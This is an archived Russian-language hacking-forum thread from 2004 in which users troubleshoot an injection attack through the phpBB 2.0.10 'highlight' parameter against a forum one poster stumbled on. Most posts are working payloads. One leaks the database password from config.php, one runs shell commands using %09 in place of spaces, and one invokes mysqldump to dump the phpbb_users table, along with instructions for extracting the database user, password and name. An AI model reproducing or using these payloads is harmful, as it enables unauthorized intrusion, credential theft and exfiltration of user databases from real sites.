Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.11.2004, 01:52
|
|
Новичок
Регистрация: 29.11.2004
Сообщений: 6
Провел на форуме:
0
Репутация:
0
|
|
phpbb 2.0.10 тех вопрос
Наткнулся на один форум, там &highlight=%2527.$poster=$dbpasswd.%2527 - бага канает, выводится пасс для бд, так же и логин, но больше ни одна бага не работает, если ковырнуть на &highlight=%2527.$poster=%60$ls%60.%2527&ls=
id;uname%20-a; - выводится )b#i
и всё ни одна из команд не работает, врятли багу там прикрыли, кто нить с этим сталкивался???
|
|
|
29.11.2004, 02:04
|
|
Участник форума
Регистрация: 24.11.2004
Сообщений: 126
Провел на форуме:
137630
Репутация:
11
|
|
если не ошибаюсь %20 - это не тот символ который здесь заменяет пробел...
|
|
|
|
29.11.2004, 02:06
|
|
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724
Репутация:
2944
|
|
Вот после этого ты должен писать команды которые там frik написал
id;uname%20-a;
|
|
|
|
29.11.2004, 02:07
|
|
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724
Репутация:
2944
|
|
Вроде бы... там так написано типа... потому что закрывать эту всю муть должны вроде б ы символы %2527, нЭ?
|
|
|
|
29.11.2004, 02:11
|
|
Новичок
Регистрация: 29.11.2004
Сообщений: 6
Провел на форуме:
0
Репутация:
0
|
|
Дык ясный день, дело в том что ни одна из команд не работает, типа cd..;pwd;ls -l - думаю понятно что это, в том то и беда, что не работают они, где-то я читал мол значит сервак не под линухом, но каким макаром тогда берётся инфа из config.php с помощью
&highlight=%2527.$poster=$dbpasswd.%2527 ???
|
|
|
|
29.11.2004, 02:38
|
|
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724
Репутация:
2944
|
|
Ну тогда не знаю, дай линк хоть на тот форум.
|
|
|
|
29.11.2004, 05:38
|
|
Новичок
Регистрация: 07.11.2004
Сообщений: 4
Провел на форуме:
0
Репутация:
0
|
|
Скорее всего,выключен register globals.
Попробуй вот так:
p=123&highlight=%2527.$poster=%60ls%09-la%60.%2527
Вместо пробела %09
Дамп базы:
p=123&highlight=%2527.$poster=%60/путь/mysqldump%09-uИмяЮзераБазы%09-pПарольБазы%09ИмяБазы%09преф кс_users%09>%09db.sql%60.%2527
ИмяЮзераБазы:$poster=$dbuser
ПарольБазы:$poster=$dbpasswd
ИмяБазы:$poster=$dbname
Префикс:$poster=$table_prefix(обычно phpbb_)
|
|
|
|
29.11.2004, 09:47
|
|
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724
Репутация:
2944
|
|
X-Seven, а /путь/
чего указывать? Покажи пример...
uИмяЮзераБазы%09- А зачем эта чёрточка в конце?
Вообщем только что проверил - не работает дамп базы.
|
|
|
|
29.11.2004, 10:08
|
|
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724
Репутация:
2944
|
|
Вот так типа по этой схеме надо делать:
mysqldump --opt -uLOGIN -pPASS DBNAME > dump.sql
LOGIN=dbuser
PASS=dbpasswd
DBNAME=dbname
|
|
|
|
29.11.2004, 21:02
|
|
Новичок
Регистрация: 29.11.2004
Сообщений: 6
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от X-Seven
Скорее всего,выключен register globals.
Попробуй вот так:
p=123&highlight=%2527.$poster=%60ls%09-la%60.%2527
Вместо пробела %09
Дамп базы:
p=123&highlight=%2527.$poster=%60/путь/mysqldump%09-uИмяЮзераБазы%09-pПарольБазы%09ИмяБазы%09преф кс_users%09>%09db.sql%60.%2527
ИмяЮзераБазы:$poster=$dbuser
ПарольБазы:$poster=$dbpasswd
ИмяБазы:$poster=$dbname
Префикс:$poster=$table_prefix(обычно phpbb_)
Да и если не трудно, то расскажи про путь к дампу.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
